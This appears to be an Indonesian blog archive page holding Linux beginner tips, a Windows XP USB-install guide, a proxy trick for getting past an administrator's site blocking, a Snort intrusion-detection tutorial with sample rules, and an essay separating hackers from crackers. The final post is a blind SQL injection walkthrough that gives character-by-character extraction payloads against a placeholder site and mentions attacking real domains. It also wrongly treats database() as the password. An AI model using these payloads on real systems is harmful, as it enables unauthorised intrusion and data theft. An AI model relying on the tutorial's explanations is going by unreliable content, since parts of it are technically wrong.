Archives

Tip & Trick belajar linux

..Saya kesulitan mempelajari Linux, mohon saran agar saya dapat menguasai Linux secara cepat dan mudah ?...

TuxSebuah pertanyaan singkat dengan jawaban panjang. Sebenarnya tidak ada yang sulit di Linux jika Anda sudah memahami dasar-dasar pengoperasian sebuah OS komputer. Jika Anda sudah terbiasa bekerja dengan Windows, maka dalam waktu singkat Anda akan segera memahami dan menguasai Linux.

Kesulitan yang dihadapi para pemula umumnya berkisar seputar pemilihan distro Linux (...ya, ada ratusan 'jenis' Linux di hadapan Anda !...), pemartisian dan teknik instalasi (tetangga pusing, data di harddisknya hilang semua gara-gara coba instal Linux !...), dan pengaksesan file-file data yang sudah ada (...bagaimana nasib data di Windows saya ?...). Permasalahan selanjutnya adalah pemilihan program kerja dan teknis pemakaian utility sistem di Linux. Berikut tip-tip untuk Anda :
Tip 1 : Pilih distro populer

Ya, cari informasi dan dapatkan CD instalasi sebuah distro yang populer di lingkungan Anda. Jika banyak rekan pakai Linux Ubuntu, kenapa tidak ikut pakai Ubuntu. Jika warnet sebelah pakai Linux SuSE, ya cari CD SuSE, biar bisa chatting di warnet sebelah. Semakin populer distro pilihan Anda, semakin banyak rekan yang memahami dan siap membantu kesulitan Anda.
Tip 2 : Pakai Live CD

Apa itu Live CD ?... Ini adalah salah satu inovasi penggunaan sistem operasi Linux. Anda tidak perlu menginstalasikan Linux atau mengorbankan isi harddisk Anda untuk mengoperasikan Linux. Dengan Live CD, Anda dapat menjalankan Linux secara aman pada komputer Anda (baca: Windows) melalui sebuah keping CD. Anda tinggal membooting komputer dengan Live CD, tunggu sebentar, nah... operasikan 'komputer Linux' instan Anda.

Meskipun dijalankan dari sebuah keping CD, Anda dapat menggunakan program dan utility Linux secara lengkap dan normal seperti jika Anda mengoperasikan sebuah Linux yang terinstal di harddisk. Selesai sesi ber-Linux dengan Live CD, Anda dapat kembali menggunakan OS lama di harddisk,seperti sediakala.
Saat ini ada beberapa pilihan distro Linux Live CD (nah!). Bingung pilih Live CD? ingat Tip no. 1 Jika sudah familiar dengan teknik pengoperasian Linux, baru instalasikan Linux secara permanen pada harddisk Anda.
Tip 3 : Baca dan baca !

Anda kesulitan mendapatkan rekan yang tangguh di Linux ? Jangan putus asa, Linux menyediakan dokumentasi secara lengkap mengenai berbagai hal sesuai topik, teknik, atau program yang ingin Anda ketahui. Sebagian dokumentasi bahkan sudah disajikan dalam bahasa Indonesia.

Dewasa ini juga sudah tersedia buku-buku Linux, pilih (...dan beli) topik buku sesuai kebutuhan Anda. Alternatif lain, di internet tersedia beragam artikel dan panduan teknis mengenai penggunaan Linux yang siap Anda download secara gratis.
Tip 4 : Sedia payung sebelum hujan

Backup seluruh data di harddisk Anda sebelum menginstal Linux. Pada banyak kasus, karena salah langkah, seluruh isi harddisk musnah setelah mencoba menginstal Linux. Siapkan keping CD secukupnya atau pindahkan data ke harddisk lain.

Semua menjadi lebih mudah dan cepat jika Anda menginstal Linux pada harddisk kosong / baru, tapi jika tidak ada, maka backup data selalu disarankan. Jika Anda telah menempatkan data pada folder tersendiri, partisi tersendiri, atau bahkan harddisk tersendiri, maka prosedur pembackupan dan pemulihan data (jika diperlukan) akan menjadi mudah dan cepat. Namun, jika data Anda tersebar di berbagai pelosok folder, maka sekarang lah saatnya Anda belajar berdisiplin dalam mengelola data secara baik dan efisien. Lakukanlah sebelum semuanya terlambat.
Tip 5 : Buat apa repot ?

" ...Kenapa saya harus pusing memikirkan hal-hal teknis, pilih distro, partisi, instal, backup, apalagi ? Saya pakai Windows juga tidak pernah dipusingkan cara instal, pilih OS, aplikasi, bla bla. Semua sudah siap di PC baru ! Saya hanya ingin pakai Linux biar aman dari sweeping, saya hanya membutuhkan PC untuk membuat surat dan laporan-laporan rutin saja !...".

Begitu kira-kira ungkapan sang relasi. Ya, ada benarnya juga pemikiran ini. Anda tidak harus repot memikirkan hal-hal teknis untuk bekerja dengan komputer Linux. Di luar sana sudah banyak penyedia layanan teknis yang akan membantu proses peralihan sistem di kantor Anda. Sisihkan sedikit anggaran bagi persiapan sistem Linux di PC, dan Anda tinggal menggunakannya. Mudah seperti yang telah Anda lakukan saat memakai Windows.
Tip 6 : Banyak jalan menuju data

Sama seperti di Windows, Anda dapat bekerja dan memilih aplikasi tertentu untuk melakukan tugas tertentu. Anda hanya perlu mengetahui padan aplikasi dan alternatif-alternatif program yang bisa Anda gunakan. Linux memiliki beragam software untuk berbagai keperluan. Cara pengoperasiannya secara umum juga sama. Open, Close, Save, Copy, Paste, adalah istilah-istilah baku yang dapat Anda kenali di setiap program aplikasi, termasuk di Linux.

Sebagian besar aplikasi Linux mampu membaca dan mengolah jenis-jenis data yang telah Anda buat atau Anda miliki ketika memakai Windows. Misalnya file data olah dokumen, data olah angka, file presentasi, gambar, hingga koleksi film dan lagu. Lihat Tip 2 untuk membiasakan diri dengan aplikasi-aplikasi Linux.
Tip 7 : Siapkan kopi dan cemilan smile.gif

Ini yang paling Anda perlukan jika memutuskan menginstal Linux sendiri dan mulai mencoba program / utility di Linux. Bisa jadi Anda akan berlama-lama di depan monitor hanya untuk menunggu progress bar di layar segera selesai, sementara Anda belum bisa memutar MP3 kesayangan.

Read More..
10 langkah instalasi dengan USB

1. Tancapkan USB flash disk ke salah satu port USB. Ingat-ingat posisi drive-nya. Apakah F:, G:, H:, dan sebagainya.

2. Saat Anda berada di posisi normal (desktop), masukkan CD instalasi Windows XP ke optical drive. Jika komputer menjalankan proses instalasi secara otomatis, batalkan saja dan tutup semua aplikasi yang tengah berjalan.

3. Unduh dan ekstrak aplikasi yang penulis berikan. Saran penulis, ekstrak seluruh isinya ke sebuah folder, semisal C:\USB.

4. Selanjutnya, buka folder di mana Anda mengekstrak aplikasi modul pembuat instalasi, kali ini kita ambil contoh C:\USB.

5. Jalankan file bernama "usb_prep8.bat" maka di layar monitor akan tampak jendela Command Prompt berisi macam-macam perintah. Jika sudah muncul tulisan "Press any key to continue," tekan sembarang tombol untuk konfirmasi.

6. Di layar akan muncul jendela PEtoUSB yang meminta Anda memformat USB flash disk Anda. Tak perlu mengubah setting apa pun, langsung klik Start untuk mulai proses format. Jawab konfirmasi sesuai kebutuhan Anda.

7. Jika sudah selesai, tutup jendela PEtoUSB (jangan menutup jendela Command Prompt yang tadi terbuka ketika Anda menjalankan usb_prep8.bat), maka di layar akan muncul opsi-opsi dari 0 hingga 5.

8. Gunakan opsi 1 untuk memilih sumber file instalasi yang nantinya akan disalin ke flash disk. Disini, tentukan di drive mana Anda menyimpan instalasi Windows XP. Pilih saja optical drive di mana sudah ada CD Windows XP di dalamnya, atau pilih folder pilihan Anda jika Anda telah menyalin file instalasi Windows XP ke folder tertentu.

9. Pilih opsi 3 untuk menentukan di mana Anda mencolok flash disk. Kalau flash disk Anda berada di drive F:, maka ketik F dan tekan ENTER. Jika drive G: maka ketik G dan tekan ENTER, begitu seterusnya berlaku untuk drive lain.

10. Selanjutnya pilih opsi 4 untuk mulai proses pembuatan modul instalasi yang nantinya akan disalin ke flash disk secara otomatis. Jawab apa pun konfirmasi yang muncul dengan Y atau YES atau OK atau bentuk persetujuan lain.

Selesai! Kini flash disk Anda telah siap digunakan untuk instalasi Windows XP! Silahkan melakukan setting pada BIOS subnotebook Anda, dan pilih Removeable Disk (atau apa pun nama lainnya) sebagai media pertama yang dijalankan saat booting.

Read More..
Membuka situs yang terblokir

Kita biasanya di buat kesal karena sang admin membatasi akses kita dengan menutup situs website tertentu dikarenakan alasan tertentu pula.Untuk membuka situs yang kita inginkan caranya sangat gampang.Hanya dengan membuka http://www.ninjacloak.com/ kita dapat membuka situs yang diblok oleh sang admin.
Caranya adalah :
1. Buka site http://www.ninjacloak.com/
2. Copy URL yang di blokir oleh sang admin
3. Paste pada Enable HTTPS Secure Mode (harder to block)
4. Enter dan lihat hasilnya

Dengan syarat http://www.ninjacloak.com/ tidak di blokir oleh sang admin hehehe....
Selamat mencoba!!!

Read More..
Category:   Leave a Comment
Monitoring Serangan Hacker Ke Jaringan Dengan Snort

Monitoring Serangan Hacker Ke Jaringan Dengan Snort
Oleh avudz syah putra Published: Juni 17, 2003 Print Snort merupakan salah satu software favorit yang digunakan untuk memproteksi network dari serangan hacker. Proteksi tambahan ini cukup memadai untuk menghindari serangan hacker pada umumnya.


'SNORT' merupakan salah satu software untuk mendeteksi intrusi pada system, mampu menganalisa 'real-time traffic' dan logging ip, mampu menganalisa port dan mendeteksi segala macam 'serangan' dari luar seperti buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting. secara default nya snort mempunyai 3 hal yang terpenting yaitu :

(1) paket sniffer, seperti tcpdump, iptraf dll
(2) paket logger, yang berguna untuk paket traffic dll
(3) NIDS, deteksi intrusi pada network.


1.1 Pengenalan

Snort bukanlah software yang sulit, tapi perlu banyak latihan karena banyaknya 'command-command' yang harus digunakan, tujuan dari pembuatan artikel ini untuk membuat user lebih mudah untuk mengenali 'snort'.

1.2 Instalasi

download paket yang terbaru dari snort.org, saya disini menggunakan snort 2.0.0

# wget -c http://www.snort.org/dl/snort-2.0.0.tar.gz


jangan lupa juga mendownload rules terbaru.

# wget -c http://www.snort.org/dl/rules/snortrules-stable.tar.gz


extract dan install paket snort

# tar -zxvf snort-2.0.0.tar.gz ; cd snort-x.x.x ; ./configure ; make ; make install


untuk lebih lengkap nya silahkan baca ./configure --help secara default snort akan terinstall di /usr/local/bin/snort


1.3 Paket Sniffer

fyuh, mari coba pelajaran dasar dulu ;) jika anda ingin menampilkan TCP/IP header ke layar ( mis. sniffer mode ), coba perintah ini:

# snort -v

command di atas akan menjalan snort dan hanya akan menampilkan IP dan TCP/UDP/ICMP header, tapi jika anda mau melihat transit data coba dengan command ini

# snort -vd


instruksi tersebut akan menampilkan transit data, tapi jika anda mau lebih spesifik coba dengan


# snort -vde



1.3 Paket logger

ok, command-command di atas mungkin hanya sebagai pengenalan, pada instruksi diatas ada kasus dimana kita tidak mungkin melihat ke layar setiap menit nya ;) oleh karena itu dibutuhkan log, sebelum nya buat direktori 'log' di direktori kerja anda sekarang

# mkdir -p log

# snort -dve -l ./log



Jika instruksi diatas dijalankan, tetapi anda belum membuad direktory log, maka snort akan segera berhenti dengan keterangan 'ERROR: log directory './log' does not exist', jika berhasil, snort akan menyimpan setiap paket ke dalam direktori-direktory IP address, jika sistem anda memiliki beberapa network tetapi anda hanya ingin memonitor network tertentu saja.


# snort -dev -l ./log -h 192.168.1.0/24


Rules ini akan menyimpan setiap data link dan TCP/IP header ke dalam direktory 'log' dan menyimpan setiap paket dari 192.168.1.0 kelas C network.


1.4 Mendeteksi 'Pengacau' Jaringan

Sebelum ini di bahas, sebaik nya anda membaca manual dari snort.org, http://www.snort.org/docs/writing_rules/chap2.html , disini diminta untuk membuat rules sendiri atau anda bisa memakai rules yang di sedikan oleh snort.org sendiri.


# tar -zxvf snortrules-stable.tar.gz


tapi, saya coba membuat rules sendiri, karena saya kurang suka dengan paket dari orang lain, setelah di gunain tapi tidak tahu gunanya buat apa ;) contoh rules sederhana

# cd rules; touch avudz.conf

# vi avudz.conf

alert tcp any any -> ipsaya/29 21 (content: "root"; \

msg: "FTP root login";)

alert tcp any any -> ipprivate/24 22 (msg:"sshd access";)

alert tcp any any -> ipsaya/29 21 (content: "anonymous"; \

msg: "Ada yg Coba FTP server!";)

alert tcp any any -> ipsaya/29 22 (msg:"ada yang login";)

# http://www.linuxsecurity.com/feature_stories/feature_story-144.html


Content digunakan untuk mendefinisikan inputan dari $user, sedangkan msg untuk membuat pernyataan tentang $user yang menggunakan 'content' tersebut.

sebelum rules baru ini di jalankan, pastikan anda membuat direktory logging di /var/log/snort

# mkdir -p /var/log/snort


tetapi jika anda merasa partisi /var anda sudah minim, silahkan buat symbolic link untuk logging, misal

# ln -s /home/avudz/snort/log /var/log/snort


ok, selesai sudah ;) sekarang coba kita jalankan software nya.


# snort -d -c rules/avudz.conf

Running in IDS mode

Log directory = /var/log/snort

Initializing Network Interface eth0



setelah itu silahkan anda coba ftp / ssh ke server anda dari network yang berbeda ( diconfig saya menggunakan ip public), dan pantau traffic nya.


# tail -f /var/log/snort/alert



contoh :


[**] [1:0:0] ada yang login [**]

[Priority: 0]

06/12-05:47:23.911639 202.xxx.xxx.xx:3962 -> 202.xxx.xxx.xxx:22

TCP TTL:64 TOS:0x10 ID:57036 IpLen:20 DgmLen:52 DF

***A**** Seq: 0xAC015F2A Ack: 0xAD5438B5 Win: 0x3EBC TcpLen: 32

TCP Options (3) => NOP NOP TS: 16723031 55655688

[**] [1:0:0] Ada yg Coba FTP server! [**]

[Priority: 0]

06/12-05:48:24.419800 202.xxx.xxx.xx:3971 -> 202.xxx.xxx.xxx:21

TCP TTL:64 TOS:0x10 ID:57642 IpLen:20 DgmLen:68 DF

***AP*** Seq: 0xAE133FB1 Ack: 0xAFCB3637 Win: 0x3EBC TcpLen: 32

TCP Options (3) => NOP NOP TS: 16729081 55661127



Ah.. selesai sudah, tinggal tambahin beberapa rules yang dibutuhkan untuk memantau aktivitas 'machine' anda ;) misalnya iseng mo monitor irc server, tinggal tambahin di avudz.conf

# vi rules/avudz.conf

alert tcp ipsaya any -> any 6666:7000 (msg:"CHAT IRC "; flow:to_server,established; content: "NICK "; offset:0; classtype:misc-activity; sid:542; rev:8;)

alert tcp ipsaya any -> any 6666:7000 (msg:"permintaan DCC Chat "; flow:to_server,established; content:"PRIVMSG "; nocase; offset:0; content:" \:.DCC SEND"; nocase; classtype:misc-activity; sid:1639; rev:3;)

# === done === #


Semua config dan rules nya bisa anda pelajari dari file snortrules-stable.tar.gz yang sudah di extract, seperti msyql rules, backdoor rules, ICMP rules, bad traffic rules dll.

Read More..
Category:   Leave a Comment
Hacker sejati beda dengan cracker

Ajari saya meng-hack server orang dong mas, saya pingin menjadi hacker nih (Joko, Semarang)

Ini termasuk pertanyaan yang sering masuk ke mailbox dan window YM saya. Dalam beberapa tahun ini terminologi hacking memang menjulang. Buku yang “tipis”, “instan” dan menggunakan judul “hacking” menjadi syarat baru penulisan buku-buku populer di Indonesia. Ini adalah permainan berbahaya dari para penerbit (yang diamini penulis) karena kerusakannya bisa sampai ke generasi muda kita. Membuat semakin kentalnya budaya bahwa ilmu pengetahuan bisa didapat dengan cara cepat, instan, bahkan cukup dengan modal buku setebal 20-50 halaman. Yang pasti hacker bukanlah craker, hacker membangun sesuatu sedangkan cracker merusaknya. Mari kita kupas tentang hakekat hacker dan hacking activities ini.

Sebagian besar literatur menyebut bahwa istilah dan budaya hacker pertama kali digunakan pada tahun 1961 ketika MIT mendapat kesempatan menikmati mesin PDP-1. Komputer pertama produksi DEC ini menjadi mainan favorit mahasiswa MIT khususnya yang tergabung di Tech Model Railroad Club. Mereka membuat alat-alat pemrograman, membuat banyak program, mengembangkan etika, jargon dan bahkan ngoprek PDP-1 sehingga menjadi mesin video-game generasi awal. Budaya inilah yang kemudian terkenal menjadi budaya hacker yang sebenarnya. Para hacker di Tech Model Railroad Club menjadi tim inti laboratorium penelitian Artificial Intelligence (AI) MIT yang menjadi pioneer dalam penelitian AI di dunia sampai saat ini.

Project ARPAnet yang dikembangkan oleh Departemen Pertahanan Amerika tak lepas dari campur tangan para hacker MIT ini. ARPAnet lah yang menyatukan budaya hacker dari berbagai “suku”, misalnya dari Standford University dan Carnegie Mellon University (CMU). Para hacker MIT bahkan akhirnya berhasil mengembangkan sistem operasi sendiri bernama ITS (Incompatible Time-Sharing System) yang legendaris, menggantikan TOPS-10 sistem operasi standard yang diproduksi oleh DEC untuk PDP-10. ITS awalnya dibangun dengan assembler, tapi kemudian diubah ke dalam bahasa LISP, bahasa pemrograman functional yang dekat dengan dunia Artificial Intelligence.

Kreasi lain dari para hacker MIT yang cukup legendaris adalah Emacs (karya Richard Stallman), editor favorit yang tetap dipakai oleh banyak programmer mesin unix sampai saat ini. Saya mengenal pertama kali Emacs ketika masuk kampus di Saitama University tahun 1995, saya gunakan untuk menulis semua laporan kuliah saya, membaca email, browsing web, membaca newsgroup dan bahkan Emacs jugalah yang saya gunakan untuk membangun IlmuKomputer.Com generasi awal. Selain hacker dari MIT, para hacker Stanford University dan CMU juga tidak mau kalah, mereka bahkan berhasil mengembangkan aplikasi bersekala besar berupa expert system dan robot industri.

Hacker dari Bell Labs bernama Ken Thomson yang dibantu oleh hacker lain bernama Dennis Ritchie dengan bahasa C-nya mengembangkan sistem operasi Unix. Kolaborasi Thomson dan Ritchie adalah kekuatan yang sangat fenomenal, karena mesin Unix dan bahasa C adalah formula manjur pengembangan sistem operasi Unix dari varian manapun sampai saat ini (BSD maupun System V dimana Linux termasuk didalamnya). Perlu dicatat juga bahwa pada tahun 1982, para hacker dari Stanford dan Berkeley yang dipimpin William (Bill) Joy mendirikan satu perusahaan bernama Sun Microsystem.

Era 1984 dimulainya berbagai episode cracking yang cepat terkenal karena diangkat oleh pers dan para jurnalis. Para jurnalis mulai keliru menyebut kejahatan komputer dan penyimpangannya sebagai sebuah “hacking activities” dimana pelakuknya disebut dengan hacker.

Hacker yang sebenarnya adalah seperti Richard Stallman yang berjuang dengan Free Software Foundation dan puluhan tahun bermimpi membangun sistem operasi bebas bernama HURD. Linux Torvald juga adalah seorang hacker sejati karena tetap komitmen dengan pengembangan kernel Linuxnya sampai sekarang. Kontributor dalam pengembangan Linux dan software open source lain juga adalah para hacker-hacker sejati.

Pelaku carding (penyalahgunaan kartu kredit), phreaking, dan defacing bukanlah hacker tapi mereka adalah cracker. Ungkapan legendaris dari Eric S Raymond dalam tulisan berjudul how to become a hacker, “hacker membangun banyak hal dan cracker merusaknya“. Hacker sejati adalah seorang programmer yang baik. Sesuatu yang sangat bodoh apabila ada orang atau kelompok yang mengklaim dirinya hacker tapi sama sekali tidak mengerti bagaimana membuat program. Sifat penting seorang hacker adalah senang berbagi, bukan berbagi tool exploit, tapi berbagi ilmu pengetahuan. Hacker sejati adalah seorang penulis yang mampu memahami dan menulis artikel dalam bahasa Ibu dan bahasa Inggris dengan baik. Hacker adalah seorang nerd yang memiliki sikap (attitude) dasar yang baik, yang mau menghormati orang lain, menghormati orang yang menolongnya, dan menghormati orang yang telah memberinya ilmu, sarana atau peluang.

Bukanlah sifat seorang hacker apabila diberi kepercayaan memegang administrasi di sebuah server malah memanfaatkannya untuk kegiatan cracking. Atau bahkan kemudian menyerang dan menghancurkan server dari dalam ditambahi dengan memberi ejekan kepada pemilik server yang telah memberinya kesempatan. Dengan terpaksa saya sampaikan, sayapun pernah mengalaminya. Selama ini saya selalu mendukung movement anak-anak muda di dunia maya, saya senang dengan semangat mereka. Ratusan komunitas saya beri domain dan hosting gratis sebagai reward perdjoeangan mereka karena mau sharing knowledge ke teman-teman lain di tanah air. Sayangnya ada cracker yang mengaku hacker (meski tidak memiliki attitude sebagai hacker) yang mempermainkan peluang ini. Setelah puas membuat satu dedicated server yang berisi ratusan situs komunitas lain di-shutdown perusahaan penyedia server karena kegiatan phreaking yang dia lakukan, masih sempatnya mengumpat saya dengan sebutan-sebutan yang tidak manusiawi. Apakah saya kapok? Tidak :) Saya akan tetap memberi kepercayaan, dukungan server dan domain gratis bagi aktifis-aktifis dunia maya.

Hacker bukanlah orang dengan nickname, screenname atau handlename yang lucu, konyol dan bodoh. Eric S Raymond menyebut bahwa menyembunyikan nama, sebenarnya hanyalah sebuah kenakalan, perilaku konyol yang menjadi ciri para cracker, warez d00dz dan para pecundang yang tidak berani bertanggungjawab atas perbuatannya. Hacker adalah sebuah reputasi, mereka bangga dengan pekerjaan yang dilakukan dan ingin pekerjaan itu diasosiasikan dengan nama mereka yang sebenarnya. Hacker tidaklah harus orang komputer, karena konsep hacking adalah para pembelajar sejati, orang yang penuh antusias terhadap pekerjaannya dan tidak pernah menyerah karena gagal. Dan para hacker bisa muncul di bidang elektronika, mesin, arsitektur, ekonomi, politik, dsb.

Meluruskan pemahaman masalah hacker adalah proyek penyelamatan generasi dan perbaikan bangsa. Dan ini bisa dimulai dengan memperbaiki kurikulum pendidikan kita sehingga mampu mendidik mahasiswa kita menjadi hacker sejati. Dan marilah kita bersama-sama berdjoeang supaya menjadi hacker yang bisa memberi manfaat dan yang bisa memperbaiki republik ini dari keterpurukan.

Read More..
Category:   Leave a Comment
Blind SQL Injection (Dummy Again)

Oleh Cruz3N Published: Oktober 1, 2008 Updated: Oktober 13, 2008 Print Aku akan mencoba menjelaskan sesimple mungkin tentang blind sql injection yang aku anggap dulu rumit banget... Bukannya sok ngajarin atau apalah, disini aku hanya berusaha memberikan apa yang aku punya dan bisa... Oke, semua bermula karena aku suntuk banget...Semua target .go.id, co.id atau apapun.id dah dibabat habis sama senior disini...Akhirnya tanpa sengaja aku nyangkut ke situs luar...Anggep aja situs tersebut bernama http://iseng.com/news.php?id=76009 Nah pada target aku kali ini, aku menggunakan sql commands mid() yang hampir sama fungsinya dengan substring()... Langsung aja aku ketik http://iseng.com/news.php?id=76009 and 1=0 dan ternyata hasilnya adalah FALSE http://iseng.com/news.php?id=76009 and 1=1 bernilai TRUE Nah setelah aku yakin kalo web tersebut vulnerable maka aku melakukan injeksi (hehehehe...) http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65) Nah penjelasannya supaya lo semua pada ngerti (hehehehe...orang aku juga baru belajar, sok ngasih tau...) aku akan coba menjelaskan arti dan makna dari baris URL dan statement diatas... ~ mid(user()1,1) artinya dalam kasus ini aku tidak mengetahui value atau nilai dari user itu apa, maka dalam "()" aku sengaja kosongkan. ~ 1,1 adalah urutan dari value tersebut. ~ CHAR adalah peubah dalam desimal ~ 65 adalah value decimal tersebut dan 65 adalah "A" dalam ASCII so aku akan mengawalinya dengan 65 Nah kalo dah begini apa yang akan terjadi? Dalam tampilan web tersebut akan terjadi true atau false...Nah dalam kasus ini false, berarti aku harus memasukkan nilai yang lain agar menjadi true... FALSE http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65) FALSE http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(66) TRUE!!! http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(67) Akhirnya mendapatkan nilai true dan nilai tersebut adalah 67 (C dalam ASCII) Cari nilai kedua dan caranya adalah... http://iseng.com/news.php?id=76009 and mid(user(),1,2)=CHAR(67,65) Nah 1,1 nya dah diganti dengan 1,2...Jadi kalo dah dapet diganti aja jadi 1,3...1,4 dan seterusnya... Nah akhirnya aku mendapat nilai true pada angka ke 82 (R dalam ASCII) Lanjutin aja sampe dapet nilai atau value user dan sampai akhirnya menjadi http://iseng.com/news.php?id=76009 and mid(user(),1,6)=CHAR(67,82,85,90,51,78) 67=C 82=R 85=U 90=Z 51=3 78=N Ternyata username-nya adalah CRUZ3N (Wow.... Kebetulan yang sangat lucu ;p) Nah untuk cari passwordnya aku tinggal mengganti value user() menjadi database() dan lakukan semua tahap diatas dari pertama sampe dapet value true... Contoh: http://iseng.com/news.php?id=76009 and mid mid(database(),1,5)=CHAR(75,69,82,69,78) Jadi password yang didapat adalah... 75=K 69=E 82=R 69=E 78=N Jadi username dan passwordnya adalah CRUZ3N dan KEREN... Ternyata Blind SQL Injection gak nyebel-nyebelin amat (Tapi ngebetein...). Nah katanya neh...cara ini cukup efektif untuk web yang telah menfilter SQL Injection...Bener gak tuh? Gak tau dah... Ilmu aku belom nyampe situ... Oke sampe disini aja yah... Mohon maaf jika ada salah-salah kata dan berhubung aku lupa jadi kagak ada screenshootnya (Padahal kalo ada keren banget tuh ;p). Semoga penjelasan yang sangat amat singkat dan gak ada apa-apanya ini dapat berguna... Nih kode ASCII yang sapa tau berguna... Char Code Description 9 Tab 10 Line feed 13 Carriage return ' ' 32 Space ! 33 Exclamation mark " 34 Quotation mark # 35 Number sign $ 36 Dollar sign % 37 Percent sign & 38 Ampersand ' 39 Apostrophe ( 40 Left parenthesis ) 41 Right parenthesis * 42 Asterisk + 43 Plus sign , 44 Comma - 45 Hyphen-minus . 46 Full stop / 47 Solidus 0 48 Digit zero 1 49 Digit one 2 50 Digit two 3 51 Digit three 4 52 Digit four 5 53 Digit five 6 54 Digit six 7 55 Digit seven 8 56 Digit eight 9 57 Digit nine : 58 Colon ; 59 Semicolon <> = 61 Equals sign > 62 Greater-than sign ? 63 Question mark @ 64 Commercial at A 65 Latin capital letter A B 66 Latin capital letter B C 67 Latin capital letter C D 68 Latin capital letter D E 69 Latin capital letter E F 70 Latin capital letter F G 71 Latin capital letter G H 72 Latin capital letter H I 73 Latin capital letter I J 74 Latin capital letter J K 75 Latin capital letter K L 76 Latin capital letter L M 77 Latin capital letter M N 78 Latin capital letter N O 79 Latin capital letter O P 80 Latin capital letter P Q 81 Latin capital letter Q R 82 Latin capital letter R S 83 Latin capital letter S T 84 Latin capital letter T U 85 Latin capital letter U V 86 Latin capital letter V W 87 Latin capital letter W X 88 Latin capital letter X Y 89 Latin capital letter Y Z 90 Latin capital letter Z [ 91 Left square bracket 92 Reverse solidus ] 93 Right square bracket ^ 94 Circumflex accent _ 95 Low line ` 96 Grave accent a 97 Latin small letter a b 98 Latin small letter b c 99 Latin small letter c d 100 Latin small letter d e 101 Latin small letter e f 102 Latin small letter f g 103 Latin small letter g h 104 Latin small letter h i 105 Latin small letter i j 106 Latin small letter j k 107 Latin small letter k l 108 Latin small letter l m 109 Latin small letter m n 110 Latin small letter n o 111 Latin small letter o p 112 Latin small letter p q 113 Latin small letter q r 114 Latin small letter r s 115 Latin small letter s t 116 Latin small letter t u 117 Latin small letter u v 118 Latin small letter v w 119 Latin small letter w x 120 Latin small letter x y 121 Latin small letter y z 122 Latin small letter z { 123 left curly bracket | 124 Vertical line } 125 Right curly bracket ~ 126 Tilde  127 (not used) ? 128 Euro sign Currency Symbols ? 129 (not used) ? 130 Single low-9 quotation mark General Punctuation ? 131 Latin small letter f with hook Latin Extended-B ? 132 Double low-9 quotation mark General Punctuation ? 133 Horizontal ellipsis General Punctuation ? 134 Dagger General Punctuation ? 135 Double dagger General Punctuation ? 136 Modifier letter circumflex accent Spacing Modifier Letters ? 137 Per mille sign General Punctuation ? 138 Latin capital letter S with caron Latin Extended-A ? 139 Single left-pointing angle quotation mark General Punctuation ? 140 Latin capital ligature OE Latin Extended-A ? 141 (not used) ? 142 Latin capital letter Z with caron Latin Extended-A ? 143 (not used) ? 144 (not used) ? 145 Left single quotation mark General Punctuation ? 146 Right single quotation mark General Punctuation ? 147 Left double quotation mark General Punctuation ? 148 Right double quotation mark General Punctuation ? 149 Bullet General Punctuation ? 150 En dash General Punctuation ? 151 Em dash General Punctuation ? 152 Small tilde Spacing Modifier Letters ? 153 Trade mark sign Letterlike Symbols ? 154 Latin small letter s with caron Latin Extended-A ? 155 Single right-pointing angle quotation mark General Punctuation ? 156 Latin small ligature oe Latin Extended-A ? 157 (not used) ? 158 Latin small letter z with caron Latin Extended-A ? 159 Latin capital letter Y with diaeresis Latin Extended-A 160 No-break space ? 161 Inverted exclamation mark ? 162 Cent sign ? 163 Pound sign ? 164 Currency sign ? 165 Yen sign ? 166 Broken bar ? 167 Section sign ? 168 Diaeresis ? 169 Copyright sign ? 170 Feminine ordinal indicator ? 171 Left-pointing double angle quotation mark ? 172 Not sign ? 173 Soft hyphen ? 174 Registered sign ? 175 Macron ? 176 Degree sign ? 177 Plus-minus sign ? 178 Superscript two ? 179 Superscript three ? 180 Acute accent ? 181 Micro sign ? 182 Pilcrow sign ? 183 Middle dot ? 184 Cedilla ? 185 Superscript one ? 186 Masculine ordinal indicator ? 187 Right-pointing double angle quotation mark ? 188 Vulgar fraction one quarter ? 189 Vulgar fraction one half ? 190 Vulgar fraction three quarters ? 191 Inverted question mark ? 192 Latin capital letter A with grave ? 193 Latin capital letter A with acute ? 194 Latin capital letter A with circumflex ? 195 Latin capital letter A with tilde ? 196 Latin capital letter A with diaeresis ? 197 Latin capital letter A with ring above ? 198 Latin capital letter AE ? 199 Latin capital letter C with cedilla ? 200 Latin capital letter E with grave ? 201 Latin capital letter E with acute ? 202 Latin capital letter E with circumflex ? 203 Latin capital letter E with diaeresis ? 204 Latin capital letter I with grave ? 205 Latin capital letter I with acute ? 206 Latin capital letter I with circumflex ? 207 Latin capital letter I with diaeresis ? 208 Latin capital letter Eth ? 209 Latin capital letter N with tilde ? 210 Latin capital letter O with grave ? 211 Latin capital letter O with acute ? 212 Latin capital letter O with circumflex ? 213 Latin capital letter O with tilde ? 214 Latin capital letter O with diaeresis ? 215 Multiplication sign ? 216 Latin capital letter O with stroke ? 217 Latin capital letter U with grave ? 218 Latin capital letter U with acute ? 219 Latin capital letter U with circumflex ? 220 Latin capital letter U with diaeresis ? 221 Latin capital letter Y with acute ? 222 Latin capital letter Thorn ? 223 Latin small letter sharp s ? 224 Latin small letter a with grave ? 225 Latin small letter a with acute ? 226 Latin small letter a with circumflex ? 227 Latin small letter a with tilde ? 228 Latin small letter a with diaeresis ? 229 Latin small letter a with ring above ? 230 Latin small letter ae ? 231 Latin small letter c with cedilla ? 232 Latin small letter e with grave ? 233 Latin small letter e with acute ? 234 Latin small letter e with circumflex ? 235 Latin small letter e with diaeresis ? 236 Latin small letter i with grave ? 237 Latin small letter i with acute ? 238 Latin small letter i with circumflex ? 239 Latin small letter i with diaeresis ? 240 Latin small letter eth ? 241 Latin small letter n with tilde ? 242 Latin small letter o with grave ? 243 Latin small letter o with acute ? 244 Latin small letter o with circumflex ? 245 Latin small letter o with tilde ? 246 Latin small letter o with diaeresis ? 247 Division sign ? 248 Latin small letter o with stroke ? 249 Latin small letter u with grave ? 250 Latin small letter u with acute ? 251 Latin small letter with circumflex ? 252 Latin small letter u with diaeresis ? 253 Latin small letter y with acute ? 254 Latin small letter thorn ? 255 Latin small letter y with diaeresis

Read More..
Category:   Leave a Comment
